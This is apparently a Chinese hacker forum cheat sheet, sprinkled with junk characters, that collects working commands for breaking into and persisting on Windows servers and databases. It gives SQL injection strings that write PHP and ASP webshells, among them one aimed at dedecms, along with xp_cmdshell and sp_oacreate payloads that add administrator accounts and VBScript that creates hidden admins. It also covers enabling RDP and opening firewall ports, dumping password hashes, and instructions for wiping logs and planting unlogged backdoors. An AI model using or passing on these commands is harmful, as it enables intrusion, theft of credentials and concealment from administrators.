7 U! X k7 d- A' E1.net user administrator /passwordreq:no
9 I. E$ G5 X( K这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了5 T1 S0 ]3 A1 h1 v9 L
2.比较巧妙的建克隆号的步骤8 m8 {0 x) `! o, p [
先建一个user的用户9 e4 o' `1 p! y4 l. s# [
然后导出注册表。然后在计算机管理里删掉
3 }/ {. q. x( J0 R在导入,在添加为管理员组
r+ d% P' Y1 W$ a3.查radmin密码4 s( [- E% ~/ p* g
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg9 c: t/ H1 v3 X" c/ u X( \
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
- j* V. P7 R* N( \& R% l$ B建立一个"services.exe"的项, u$ C1 B/ O3 Z
再在其下面建立(字符串值)
6 ~' i& o6 L: r; y: |* S9 w键值为mu ma的全路径8 t3 q- U7 D5 D4 r5 K, r) {0 K
5.runas /user:guest cmd3 E5 I9 {5 e6 p9 [8 A
测试用户权限!- v9 l4 U8 F1 T
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
5 c6 a# ?3 u% ?0 b! \# ^3 I7.入侵后漏洞修补、痕迹清理,后门置放:
4 G ?& Q; p, Q3 N- D. m: X6 i, a基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门# @9 }* R" S: i1 F
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
0 M- W1 x# {7 @5 L+ J3 ~, a2 X& A& u" h3 ?/ K( D9 c6 j
for example( z( a: l8 U! s! ]2 \/ D5 P
- j) i0 F; P' Q# |% D+ I7 ^" `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
7 ^* ^! l- S" O, w& A* M- q
3 Q3 n1 p( c; G1 fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'/ q2 t: m% ^9 V+ p
+ q' m: ?8 x/ `: \! a o# w
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了1 V8 ]7 k: D \$ U' l% t
如果要启用的话就必须把他加到高级用户模式% S8 D% i8 X' W, z
可以直接在注入点那里直接注入
" V( m' ?: C9 W4 J1 I/ wid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
0 L5 b5 @4 Q# i然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
5 a) ?: U1 M/ [ T/ Q9 O2 p/ _# f或者
, z+ Q7 Q0 M1 L2 vsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% X. b- @1 W. _! k
来恢复cmdshell。. \/ G- v. X% @
$ V& ?4 G! G2 Z分析器 U. e; W/ l" z, V3 s
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
# O/ F) w5 K+ q( q. H3 a然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
) {7 o k; ?# y10.xp_cmdshell新的恢复办法+ n' ?2 ^. l5 S6 T8 o. H7 V
xp_cmdshell新的恢复办法+ b `8 x. m2 s, p5 T
扩展储存过程被删除以后可以有很简单的办法恢复:
* y5 b. X' K1 @* M3 u! P+ x删除
8 x1 v- ], I8 Bdrop procedure sp_addextendedproc
' ~9 u3 @1 \1 F, N1 qdrop procedure sp_oacreate# N1 }. b& L7 G, ^
exec sp_dropextendedproc 'xp_cmdshell'
Y9 v0 M; W9 x5 v
+ l: u. R% z" {& M* s恢复
- H# W* T' G! D. h2 Edbcc addextendedproc ("sp_oacreate","odsole70.dll") Y. y; t6 B t/ f
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")" e% w. _$ C9 _4 E3 m l& X0 d* F
X. o2 ]5 N) S n5 s) z' L这样可以直接恢复,不用去管sp_addextendedproc是不是存在/ v) q6 k9 E H
" E f4 ]6 X! s/ \& ~) i-----------------------------" B: V* Z+ b9 U% l/ {
0 S! h2 |- R* W删除扩展存储过过程xp_cmdshell的语句:
5 s0 `. }2 h2 T3 \exec sp_dropextendedproc 'xp_cmdshell'
' C0 ~+ j% _! q# A6 I) Q5 M: T: m; I
恢复cmdshell的sql语句
$ X: e/ ^1 ^* K9 Fexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 a6 Y5 O4 a( T" I
9 M7 W8 V+ ?& }- |: o
4 \" t3 H$ O5 O/ a- Y2 m
开启cmdshell的sql语句
- A1 m% H) Y% Z: V: K- P, u
6 ?1 Y! N6 f( H$ w- l5 D3 Iexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) F7 @8 a; O" h& d# x8 B9 ~% d: R. v$ }& P2 |
判断存储扩展是否存在
1 C4 i5 W% J2 i9 s' ]select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'- X/ @$ P0 y3 b b& Z" l
返回结果为1就ok6 S) ]& Q$ e; A* \* p& _# A
. g8 h) n/ Z6 b恢复xp_cmdshell6 H; b q% W" Y S- v- ?9 ]% }# ~
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: Y) z2 L0 I2 W4 r6 S8 a0 K返回结果为1就ok6 J$ J3 @$ j& E) d/ ^
6 j8 k1 V* o$ [! S7 k. V
否则上传xplog7.0.dll: s3 j6 |* O9 c6 \, W5 I) Q* ]
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
: @8 q8 a# a: T6 ]2 E; @
9 i5 p/ ]0 ^2 m: X: o9 G3 p堵上cmdshell的sql语句
% Z' @' Z1 t, t: P- J5 tsp_dropextendedproc "xp_cmdshel! Y+ O, L1 j- v- N; |, k4 v6 E4 Q$ |, o
-------------------------
% o, w( B( T9 k% y# X清除3389的登录记录用一条系统自带的命令:
& T2 Z9 Z$ {4 h5 f! y- `, W$ |reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f. E9 U) g0 h- A- C7 L+ d
" j, Q: M3 u- w. t1 A5 ` G
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件& g' j( d% R) u5 V! a. [5 X
在 mysql里查看当前用户的权限& z( t; C) [5 S$ e/ M1 t
show grants for 3 Y) a# V4 H( ~" Q
- G& f" ?) Y' o( ~3 I; [% u1 j以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
# d( c6 s: v8 T! K/ S8 k9 L
. I; Q4 E2 k8 S4 R, O0 b6 d, G+ R5 f" H$ @+ E3 m
Create USER 'itpro'@'%' IDENTIFIED BY '123';7 ^ ]! {5 c6 B' }& S" P- ` w
: L1 l" l1 X1 {) p7 N- d
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION" E4 `. f H. w% J( D
. L3 U: g2 d$ I6 X$ EMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0( r1 `1 r; t W4 X
3 v( r1 b, M+ [
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;& `" w2 U+ Y9 F
+ P" U$ v3 u7 U6 O
搞完事记得删除脚印哟。
) ?' j5 S+ _8 s+ h# I$ B3 K& r5 R% U+ C+ x
Drop USER 'itpro'@'%';
" U+ x) N7 V* ^1 s0 f, o7 Z
/ K# P7 O- A( DDrop DATABASE IF EXISTS `itpro` ;
+ x; q2 X6 g/ ~0 j
! L) x% N- h* q当前用户获取system权限
# C* a( o3 j$ c- {, \2 xsc Create SuperCMD binPath= "cmd /K start" type= own type= interact6 ^6 `% K' H* M3 ~) z
sc start SuperCMD
% t) ~" l7 @; {- e程序代码, ~& d6 C5 p8 c5 ]& _
<SCRIPT LANGUAGE="VBScript">( q8 n* g9 s, n f5 b4 J# Y
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
s" P! N. `9 d, E5 G+ s0 z1 v" d- O% Xos="WinNT://"&wsnetwork.ComputerName4 U2 o1 f& r7 {# S! }
Set ob=GetObject(os)4 i6 {! ~9 y; g
Set oe=GetObject(os&"/Administrators,group")
# X9 k* E, S1 h3 LSet od=ob.Create("user","nosec") c( p0 Y4 P3 @
od.SetPassword "123456abc!@#"
$ f& L$ Q0 M% ood.SetInfo' v; L# g( J' e% f0 O3 N
Set of=GetObject(os&"/nosec",user)
& \! L& ?' i" ~ K! Q0 _- coe.add os&"/nosec"8 k- j" J" G. ]/ U; e8 q
</Script>
, E6 j; ~* e9 L, q- h# p7 K<script language=javascript>window.close();</script>
7 H# `1 c$ t3 h
* a0 U' \ e# s* U% N9 H# h
6 J- S) `/ G, u' L- A( c/ l, Y+ Z1 `
$ n5 ?1 B0 d' K
突破验证码限制入后台拿shell4 _; t# Z6 ^7 E# P
程序代码0 v4 U: ]( O5 x. l% T0 @
REGEDIT4
) ]1 m8 _9 [% e/ f[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] # t1 ?8 h0 b8 Z. p. @2 u
"BlockXBM"=dword:00000000/ P7 v$ L- ^$ ^7 G8 W
' z; j- K5 g4 ?0 P保存为code.reg,导入注册表,重器IE
5 G5 r, n! J7 K; W7 m就可以了
& w' Y1 Y2 m3 D( u5 }& \union写马
5 H8 l. C/ A# y0 J+ X, x程序代码' P7 ]7 M* c% {: l0 U7 Q: Z0 c
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*1 a$ B l$ q! H3 o6 Z: t
1 a: q: n" {/ c# |
应用在dedecms注射漏洞上,无后台写马 }% Z- Y% v" N4 L& h
dedecms后台,无文件管理器,没有outfile权限的时候5 s' y) p F1 e3 T5 s# U' N4 w
在插件管理-病毒扫描里
2 A6 o' |- c4 D( m/ B写一句话进include/config_hand.php里
; z6 R3 p1 l9 ]$ ~( v2 X程序代码
1 w( _4 ?6 J# M, F! b>';?><?php @eval($_POST[cmd]);?>1 N& u. y) I7 C, P+ z7 b1 K7 |
% g) E5 l/ r7 I
$ L/ B2 _- r" I4 x
如上格式
" T+ k- t' j6 ]+ j! `/ O
6 @' H4 X' |, X; z% xoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
/ ~- G# W+ A9 M& Y程序代码% A7 k* h+ e' w M2 Z1 y9 M+ B
select username,password from dba_users;+ ]8 x f% H8 R/ b
* `. K4 ]% D9 V8 A( i2 [' N1 [9 u8 B1 Q9 w& O/ P
mysql远程连接用户3 N+ w( d; S- @3 J0 H0 z6 [ k
程序代码
! M8 K6 @+ A) N5 Y4 {) r6 c6 ~) A+ ]. M, Z+ S4 D
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme'; q D; t. v- X
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
0 w: Z* u2 c! r J0 ]6 K; @" u9 kMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0" P: a9 e! U K9 v- R) G
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
% E) I; }4 V! X8 p1 G" G1 d) m" e, H6 M$ @" ~7 F- c% r
/ c0 Q9 B9 x5 x" Y% ^, a4 g' Y) l7 z/ v! S: x
: s0 Z, S5 H. L: j4 Y% t
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0- D: w+ O2 D( y
2 h( ? C0 v: G- H4 O6 [7 _1.查询终端端口+ {) o p$ P, j( t3 K
# H0 U% m; W6 V" L+ m3 n4 T4 A
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
; n/ u5 w2 U7 V2 z1 k( a# {7 b N9 E- n0 ^0 M* ]
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
5 ^: T a) G2 {# ?! E* mtype tsp.reg
. B% D Z: l' N) C9 A* n
, u/ F/ [: u+ }" P( C. q0 t2.开启XP&2003终端服务' b2 H# m% } K$ ?/ A! U
& @) ~* M3 X: `/ c9 m L/ Y+ u1 W
- Y- A, {/ j5 ^
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
: A. x8 f8 l) i0 l( F
K% f# G" a! F) r5 f7 m" Y
$ ?% M' P9 d3 W$ X! UREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
" ~8 [0 P9 [' T& \+ K
/ X! e: n. e: S: a' n. Z. C3.更改终端端口为20008(0x4E28)3 H5 _& \9 J/ V
- j A( `$ n# s4 P% LREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
$ a( z( p* }! n) W! z: L' A a: J S% n
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
. ?, Q% s' @! e! H" u/ s
. Z s' P5 r9 u; e4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制% L, b S& P2 ^) O: f W1 B
+ k- O' d, _! ]REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f0 `; L0 I: w" W9 W6 e0 q
9 @& k. ]7 k# ]
: ?, }3 H: p$ r$ N5.开启Win2000的终端,端口为3389(需重启); o' h# x* o& ?; l
7 {! ^9 g0 G& E: w4 y6 s9 e* E+ T
echo Windows Registry Editor Version 5.00 >2000.reg
% ~7 X$ m/ _7 I5 Becho. >>2000.reg) r/ f$ t5 i) ~' Q( i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ' I1 Y f/ g( [+ d3 n# E+ V
echo "Enabled"="0" >>2000.reg ; k; D9 _8 V" r8 @8 [1 c* k% t
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ' P0 M* {9 [" u
echo "ShutdownWithoutLogon"="0" >>2000.reg + U+ s' P6 A: K2 k: Z+ V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg ( G- s" @2 a$ X% Y+ w. `
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
% i% H, A& _3 m: Z3 Y: C. z7 yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
6 w$ y6 l# ~1 V: Y: F& Zecho "TSEnabled"=dword:00000001 >>2000.reg 4 `( {. H7 q* E; F2 u. y% [. v& F2 Y/ \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 8 P0 |% ^8 x H9 y3 f
echo "Start"=dword:00000002 >>2000.reg # ?) G- _4 i( S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 3 {9 a/ S" e1 l' A9 z* o" t: A
echo "Start"=dword:00000002 >>2000.reg 7 Y- D6 h+ [. C, w$ [
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
% e( U; i1 A* j- F8 `9 \echo "Hotkey"="1" >>2000.reg
2 B2 X" y- i2 W$ t: n- [* m: Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg 7 [* ]4 m+ V- I o+ G- Y
echo "ortNumber"=dword:00000D3D >>2000.reg , ]& O' O" I/ m- v( `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ( P& k0 ]6 ?* s2 i9 R5 N
echo "ortNumber"=dword:00000D3D >>2000.reg
/ r# G& g% N* u) j( V
1 S: a% v. `3 K; \# U/ \; j6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启): c: @0 X6 H! a! t- S
' u. m, S+ D" S! s5 p. y6 I
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf$ ?% l1 m7 b' S1 g( M
(set inf=InstallHinfSection DefaultInstall)
# N7 Q# V0 n# b9 Mecho signature=$chicago$ >> restart.inf* S, W" w3 x' u V
echo [defaultinstall] >> restart.inf' c: A0 @; f) B O' {. n# I) P
rundll32 setupapi,%inf% 1 %temp%\restart.inf9 X. v- X8 v, @
1 _( W' Z Z N) q5 A5 ?7 U
2 x6 Q* Y% Q$ H' V" C) K. | r8 i7.禁用TCP/IP端口筛选 (需重启)9 k R. F0 h& [5 ?7 `' d& C, |
' n5 G6 _* B' C* I
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f& P6 l) T: w8 f, q% |* Z; }' L
* W$ @2 s0 h3 K+ O- m6 f8 p8.终端超出最大连接数时可用下面的命令来连接
# Z6 s) H: ]+ Z5 P
4 _% {$ |- C" i; |7 k2 Imstsc /v:ip:3389 /console
# z3 ]5 g7 g% Z
& j, @' `2 D' ~2 u9.调整NTFS分区权限
5 @! |2 c; T6 e1 t: H% ~% K+ G5 ]: M; f, P
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)% F5 g7 {0 r1 k9 N
: l3 ~' c! \! b3 A/ `+ z
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
% F! `2 C. k. f
% A. ]% k) X+ @+ w) w5 P------------------------------------------------------
$ D; d1 j4 H0 K( s4 _3389.vbs
# I$ G# g$ S4 N8 v- dOn Error Resume Next
( m |: P+ _( Z fconst HKEY_LOCAL_MACHINE = &H800000027 a( v) a# ^" ^
strComputer = "."7 L) Y( D: V2 z- F
Set StdOut = WScript.StdOut$ a$ g* I: U7 ]4 N4 I6 D) v
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
b$ E- W G( h5 `* t' kstrComputer & "\root\default:StdRegProv")
! f+ N# b! S7 A" H1 s9 s* L) J' Z" y0 f3 AstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"& S+ [; t/ w9 `' }# b# ~: l7 V% l& e) w
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath& f' C1 F! v# y$ O2 o: m0 G
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"3 ]1 p0 g8 m* h$ }6 O" J
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath/ M" S* i+ Y+ B( N7 Q+ z
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
+ u( T9 v; k; K7 c& P& MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
0 D7 U* W7 R& O) p6 b2 IstrValueName = "fDenyTSConnections"( @9 r# ~2 h- s5 ^
dwValue = 0, t. b. m" K! j2 D
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
( T5 ~& s) {7 R/ YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
& S1 f$ T2 e a) i# h5 zstrValueName = "ortNumber"
7 r! M2 g+ C4 q# U/ y& V7 WdwValue = 3389& e; p& o/ A- G4 r7 c1 m" C
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
; M+ h* t1 S8 G |strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") l a8 L- p$ ~* `* U
strValueName = "ortNumber"
( X P" {& {1 B; tdwValue = 3389
) J5 {* V4 q# y9 u* aoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 j9 x" f G7 c. v& _6 lSet R = CreateObject("WScript.Shell") w- D! _- D1 ^! f2 n& j9 B2 ^
R.run("Shutdown.exe -f -r -t 0") 3 \: H: Z7 p& m7 U/ ~' I7 d* Y
8 f* K- f+ [7 h d- {. P& a删除awgina.dll的注册表键值
/ Y; M) M. W6 F: U7 e程序代码% C% t" ` e; X- {/ Z
) J* G) @) z! M# T3 s$ |! O8 Kreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
( |0 W9 F+ n0 x7 ]% S
( x. w2 X: C& b A
, }/ F& Y/ X& Y
% i. ^: m5 @2 z; P+ e, R+ y
( {2 Q3 f- l. h/ d1 V程序代码
: y# ^# a2 x& V# oHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
3 J' B% `8 ?( Q H: Q3 }$ x" X* T8 H" z3 b; o/ N
设置为1,关闭LM Hash% f- R; n) ?, c* D* _% t& S/ z
5 k/ @ Q& J; m, S数据库安全:入侵Oracle数据库常用操作命令! s. ]3 b1 ^+ U2 l2 h
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。3 `3 _7 G" ]% Q! q4 ]$ A
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
( ]' K2 T/ V* j# s" x7 D0 y2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;8 t1 ^2 \( d5 i7 L
3、SQL>connect / as sysdba ;(as sysoper)或
{2 b* U7 z2 r( C9 ?" Hconnect internal/oracle AS SYSDBA ;(scott/tiger), T9 Q" h& ~0 R: |# |
conn sys/change_on_install as sysdba;0 G3 w: S1 j2 o5 t
4、SQL>startup; 启动数据库实例 |' H" I* I1 ^. e3 q8 [
5、查看当前的所有数据库: select * from v$database;
) L' p4 {. c8 U( R6 zselect name from v$database;7 G* _, \. P9 U+ ^7 h. b ^. ]/ O; i% c
6、desc v$databases; 查看数据库结构字段
1 L6 \2 q3 R* T/ q- F- G5 m7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
3 Z' [' F3 Y+ m7 B0 wSQL>select * from V_$PWFILE_USERS;
- c' a& a9 P: K7 J) B! B) l0 _Show user;查看当前数据库连接用户
1 Y, S4 Z3 ~( H$ m" a1 v' |0 ~+ ?8、进入test数据库:database test;
8 a$ A2 i; }! Z6 V% {9、查看所有的数据库实例:select * from v$instance;9 M0 c" E2 K; l- b
如:ora9i
' S+ Q0 S" ]7 ]5 `. k5 C10、查看当前库的所有数据表:0 a& t7 j, a0 }! y7 H) w2 w8 o
SQL> select TABLE_NAME from all_tables;
1 Y. H. p( L* Hselect * from all_tables;, }4 R. Z% g% u$ g' @
SQL> select table_name from all_tables where table_name like '%u%';. O( `- g! J: ^) N7 U
TABLE_NAME
( Q4 I* ?5 |; f; R. E------------------------------
7 S' v9 @, }- x* Y( k_default_auditing_options_; R) L) M4 Z1 h: a& ?' r
11、查看表结构:desc all_tables;
) d9 a9 ]' V' f) D N/ {12、显示CQI.T_BBS_XUSER的所有字段结构:
" S" \- n- `, Tdesc CQI.T_BBS_XUSER;
7 f' m+ S5 }# Q5 _% h1 O' Q13、获得CQI.T_BBS_XUSER表中的记录:
8 Z) Y; x# I, V+ B" Qselect * from CQI.T_BBS_XUSER;5 j6 b0 L- l! X" {
14、增加数据库用户:(test11/test)( }% k0 I9 f2 G; O
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;' m; i" F {' B9 v' b) W
15、用户授权:: v& ~0 G0 u( Y# t, U6 ]
grant connect,resource,dba to test11;0 i l6 X2 v9 Y
grant sysdba to test11;# U. P* f i- L2 }
commit;4 ^2 N; E) R/ h1 }! Z8 ?
16、更改数据库用户的密码:(将sys与system的密码改为test.)
* v2 F8 k/ |; Z# U4 N$ Calter user sys indentified by test;
0 q) L1 c7 d6 `( r$ A# _alter user system indentified by test;6 A2 F) r8 P/ K. D0 F0 C
( w* Y8 o% R( j6 L E8 Z4 t* L) CapplicationContext-util.xml
* [: d6 y3 i' c d4 IapplicationContext.xml
+ M+ w& Y t7 ?# A. N% Estruts-config.xml
# R i0 u' Y" ]web.xml9 @! H S4 F* ^% Y7 Z0 c
server.xml
: U# U% t+ q! H: Vtomcat-users.xml
# }. m( u% q+ ]* D4 `+ W+ Hhibernate.cfg.xml1 j0 t: L+ r2 b% F% x
database_pool_config.xml
1 S" D1 U6 y: b5 a% M
+ w5 @3 U6 ?0 i) l' g9 [. X+ |: f$ O6 H
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置% }5 p) l5 y1 P2 ?/ t
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini2 {7 ?6 E9 |* C9 u5 g
\WEB-INF\struts-config.xml 文件目录结构
- I6 F8 b3 W6 w; ` F* b; s" `7 ]: o4 ^
spring.properties 里边包含hibernate.cfg.xml的名称) d- u( e; {* ?* D6 y
, C) r- x# F3 U& T1 s" I# R* _) p. L
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
+ j8 Y& `1 E$ K* L; {9 \1 `# u8 n, Y
如果都找不到 那就看看class文件吧。。1 @5 H1 D3 u) q1 @$ _
0 E6 i" q; k4 T- Z
测试1:6 ^. z0 Y! x6 }; _6 d( M: @
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
& w: R/ t( z8 @3 n$ v
- j& V1 N) I7 T' o, _# [测试2:" c5 ]2 F* a: E" m8 J S
" V# j$ T. E; M3 [' C7 Tcreate table dirs(paths varchar(100),paths1 varchar(100), id int)) T! t4 c r+ ^4 d) p( {0 s
5 H, ~: p' Q( |& E n4 P# V& u1 I
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
6 X, E | O5 J' q. X4 l$ {- }( x
3 {$ \5 \7 r. MSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
7 S8 J2 C* V, U) e L" B% t% N2 P1 v, @0 `2 O; _0 k7 u
查看虚拟机中的共享文件:
+ S+ \) W% U! Z: a6 G% m在虚拟机中的cmd中执行
/ j/ Q% B+ Z; _; J: s\\.host\Shared Folders& e* m( J I$ l" @# `6 w* ?, M
& g4 h. w4 a, o/ T2 |/ p
cmdshell下找终端的技巧
+ |! @1 `7 @) l8 ?9 B) d3 [" `找终端: 9 h! \7 e9 V0 _* I
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! , V) p$ I* o7 h- A
而终端所对应的服务名为:TermService ( w+ _% w6 |- Q; s' [; B9 A
第二步:用netstat -ano命令,列出所有端口对应的PID值!
4 Q) ^! ]! E, B, _& f& P; `' {8 q3 Z 找到PID值所对应的端口. E. k# u9 N, @( Y) ^8 J
* n2 c: h/ ]: ^$ S
查询sql server 2005中的密码hash, C' }) p! W7 }/ w5 B, |" L
SELECT password_hash FROM sys.sql_logins where name='sa'! ^" e: `& n9 `/ ^$ E. m8 A) J
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a3 U- J7 s7 j! ^+ J5 O
access中导出shell
/ e' y& s) G, G0 \+ Q: a9 L9 C K2 v
中文版本操作系统中针对mysql添加用户完整代码:
1 `, n9 e8 _) x5 O" Q! g3 [6 @3 s
use test;; A, h# P7 d" y; K/ X! i% O
create table a (cmd text);# ?$ K# c" P$ y+ r/ e% t, q
insert into a values ("set wshshell=createobject (""wscript.shell"") " );& V$ i g8 c# _4 y0 k2 W3 B
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );+ ]+ [+ |7 r# {4 ~. Z( X
